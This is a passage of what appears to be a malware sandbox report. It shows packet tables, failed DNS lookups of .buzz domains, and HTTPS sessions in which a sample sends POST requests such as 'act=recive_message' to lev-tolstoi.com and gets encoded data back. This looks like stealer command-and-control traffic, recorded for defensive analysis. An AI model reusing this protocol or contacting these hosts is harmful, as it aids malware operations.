                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:23.769915104 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:25.031687021 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:25.031841040 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:25.033267975 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:25.033278942 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:25.033515930 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:25.034970999 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:25.035115957 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:25.035145044 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:25.937129974 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:25.937235117 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:25.937288046 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:25.937438011 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:25.937462091 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:26.042752981 CET49710443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:26.042799950 CET44349710172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:26.042884111 CET49710443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:26.043240070 CET49710443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:26.043253899 CET44349710172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:27.299478054 CET44349710172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:27.299568892 CET49710443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:27.301022053 CET49710443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:27.301033020 CET44349710172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:27.301282883 CET44349710172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:27.302763939 CET49710443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:27.302901030 CET49710443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:27.302932024 CET44349710172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:27.302974939 CET49710443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:27.347341061 CET44349710172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:28.157445908 CET44349710172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:28.157538891 CET44349710172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:28.157617092 CET49710443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:28.157787085 CET49710443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:28.157803059 CET44349710172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:28.339234114 CET49711443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:28.339287996 CET44349711172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:28.339416027 CET49711443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:28.339685917 CET49711443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:28.339704037 CET44349711172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:29.962150097 CET44349711172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:29.962224960 CET49711443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:29.963893890 CET49711443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:29.963913918 CET44349711172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:29.964170933 CET44349711172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:29.965361118 CET49711443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:29.965524912 CET49711443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:29.965552092 CET44349711172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:29.965625048 CET49711443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:29.965637922 CET44349711172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:30.901856899 CET44349711172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:30.901962996 CET44349711172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:30.902012110 CET49711443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:30.902744055 CET49711443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:30.902765989 CET44349711172.67.157.254192.168.2.8

                                                                                                                                                                                                                                                                                        UDP Packets

                                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:15.286973953 CET6335753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:15.426991940 CET53633571.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:15.432013988 CET5571153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:15.572371006 CET53557111.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:15.573887110 CET5077553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:15.713772058 CET53507751.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:15.715329885 CET5838053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:15.855832100 CET53583801.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:15.857537031 CET6199353192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:15.997457981 CET53619931.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:16.000648022 CET6048753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:16.141239882 CET53604871.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:16.144553900 CET5010253192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:16.287050962 CET53501021.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:16.294003010 CET5415853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:16.433768988 CET53541581.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:16.439160109 CET5622053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:16.578535080 CET53562201.1.1.1192.168.2.8
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.038608074 CET6310753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.180243015 CET53631071.1.1.1192.168.2.8

                                                                                                                                                                                                                                                                                        DNS Queries

                                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:15.286973953 CET192.168.2.81.1.1.10xdd5eStandard query (0)cashfuzysao.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:15.432013988 CET192.168.2.81.1.1.10x4305Standard query (0)prisonyfork.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:15.573887110 CET192.168.2.81.1.1.10x6e63Standard query (0)rebuildeso.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:15.715329885 CET192.168.2.81.1.1.10xd655Standard query (0)scentniej.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:15.857537031 CET192.168.2.81.1.1.10x264Standard query (0)inherineau.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:16.000648022 CET192.168.2.81.1.1.10x90c9Standard query (0)screwamusresz.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:16.144553900 CET192.168.2.81.1.1.10x8814Standard query (0)appliacnesot.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:16.294003010 CET192.168.2.81.1.1.10x781fStandard query (0)hummskitnj.buzzA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:16.439160109 CET192.168.2.81.1.1.10x2df5Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.038608074 CET192.168.2.81.1.1.10x3f02Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                        DNS Answers

                                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:15.426991940 CET1.1.1.1192.168.2.80xdd5eName error (3)cashfuzysao.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:15.572371006 CET1.1.1.1192.168.2.80x4305Name error (3)prisonyfork.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:15.713772058 CET1.1.1.1192.168.2.80x6e63Name error (3)rebuildeso.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:15.855832100 CET1.1.1.1192.168.2.80xd655Name error (3)scentniej.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:15.997457981 CET1.1.1.1192.168.2.80x264Name error (3)inherineau.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:16.141239882 CET1.1.1.1192.168.2.80x90c9Name error (3)screwamusresz.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:16.287050962 CET1.1.1.1192.168.2.80x8814Name error (3)appliacnesot.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:16.433768988 CET1.1.1.1192.168.2.80x781fName error (3)hummskitnj.buzznonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:16.578535080 CET1.1.1.1192.168.2.80x2df5No error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.180243015 CET1.1.1.1192.168.2.80x3f02No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                        Dec 28, 2024 10:05:19.180243015 CET1.1.1.1192.168.2.80x3f02No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                                                                                                                                                        • steamcommunity.com
                                                                                                                                                                                                                                                                                        • lev-tolstoi.com

                                                                                                                                                                                                                                                                                        HTTPS Proxied Packets

                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        0192.168.2.84970623.55.153.1064437680C:\Users\user\Desktop\MPgkx6bQIQ.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:18 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                        Host: steamcommunity.com
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:18 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                        Date: Sat, 28 Dec 2024 09:05:18 GMT
                                                                                                                                                                                                                                                                                        Content-Length: 35121
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Set-Cookie: sessionid=a52a1783951580a407429088; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                                                        Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:18 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:18 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                                                                        Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:19 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                                                                        Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        1192.168.2.849707172.67.157.2544437680C:\Users\user\Desktop\MPgkx6bQIQ.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:20 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                        Content-Length: 8
                                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:20 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                                                        Data Ascii: act=life
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:21 UTC1127INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Sat, 28 Dec 2024 09:05:21 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=fuj5olnlfmgditvpafo7pcvrm9; expires=Wed, 23 Apr 2025 02:51:59 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=yt%2BnlZu01e5ulu6WlNhuTOx7M%2FHy3Yx5QE%2BEU8HUCl94gbyPY9S%2Bt%2FarD6KuTiiDylwd0BoNydi3lSfeHJzioLuRZ0zKIADiRpzMSRo3qoI4e98UFZpnHD4W1H0WVhAZKYA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                        CF-RAY: 8f9063588e5fc439-EWR
                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1557&min_rtt=1508&rtt_var=601&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1936339&cwnd=207&unsent_bytes=0&cid=7a799228ededecd0&ts=766&x=0"
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:21 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 2ok
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                        2192.168.2.849708172.67.157.2544437680C:\Users\user\Desktop\MPgkx6bQIQ.exe
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:22 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                        Content-Length: 74
                                                                                                                                                                                                                                                                                        Host: lev-tolstoi.com
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:22 UTC74OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66
                                                                                                                                                                                                                                                                                        Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:23 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Sat, 28 Dec 2024 09:05:23 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Set-Cookie: PHPSESSID=4nb3cdj9rl4sea1ph5bjq5bakn; expires=Wed, 23 Apr 2025 02:52:02 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                        X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                        X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                        cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                                                        vary: accept-encoding
                                                                                                                                                                                                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9CI%2FyoDxKwwBrT0%2Bh8dQw6j39QffpJcxnaToER6HHjVrNnr8ODlEToU%2BPoQvvwnAWpBn%2FYY5MbGJCny13vQQJj4W2Cm3ftpabFOu9D5DqfOP7XUlD07mXWKPBaokYkVYgxE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                        Server: cloudflare
                                                                                                                                                                                                                                                                                        CF-RAY: 8f9063658d636a4e-EWR
                                                                                                                                                                                                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1638&min_rtt=1633&rtt_var=622&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=973&delivery_rate=1745367&cwnd=202&unsent_bytes=0&cid=0b6540e8b8f14864&ts=789&x=0"
                                                                                                                                                                                                                                                                                        2024-12-28 09:05:23 UTC244INData Raw: 34 36 63 0d 0a 68 73 35 37 7a 6d 48 4f 66 70 45 33 39 4e 75 76 66 57 48 6a 55 64 42 74 2f 70 39 33 75 58 58 49 4e 67 31 4f 4c 32 72 51 58 6f 50 39 37 41 33 73 57 2f 70 53 73 30 53 52 2b 5a 55 4a 45 35 59 30 2f 45 2b 66 2b 31 57 44 45 36 6c 61 66 69 73 44 53 4b 59 7a 6f 62 79 6f 47 71 49 53 71 31 4b 7a 55 6f 7a 35 6c 53 59 61 77 54 53 2b 54 38 53 39 45 74 4d 58 71 56 70 76 4c 30 51 46 6f 44 4c 67 37 71 49 63 70 67 53 74 47 76 42 62 6d 62 37 4b 47 41 43 4a 50 37 6b 41 6c 76 4a 56 6c 56 65 74 54 43 39 30 44 53 65 31 4b 75 4c 4c 72 77 69 6c 51 37 4e 53 36 68 57 52 74 59 31 48 51 34 49 30 73 67 47 59 2b 78 7a 52 48 61 42 53 62 69 70 46 47 72 6b 34 36 2b 36 73 48 36 63 4f 70 41 37 39 55 5a 36 31 7a 42 49 41 77 58 33 79 43 49 53
                                                                                                                                                                                                                                                                                        Data Ascii: 46chs57zmHOfpE39NuvfWHjUdBt/p93uXXINg1OL2rQXoP97A3sW/pSs0SR+ZUJE5Y0/E+f+1WDE6lafisDSKYzobyoGqISq1KzUoz5lSYawTS+T8S9EtMXqVpvL0QFoDLg7qIcpgStGvBbmb7KGACJP7kAlvJVlVetTC90DSe1KuLLrwilQ7NS6hWRtY1HQ4I0sgGY+xzRHaBSbipFGrk46+6sH6cOpA79UZ61zBIAwX3yCIS
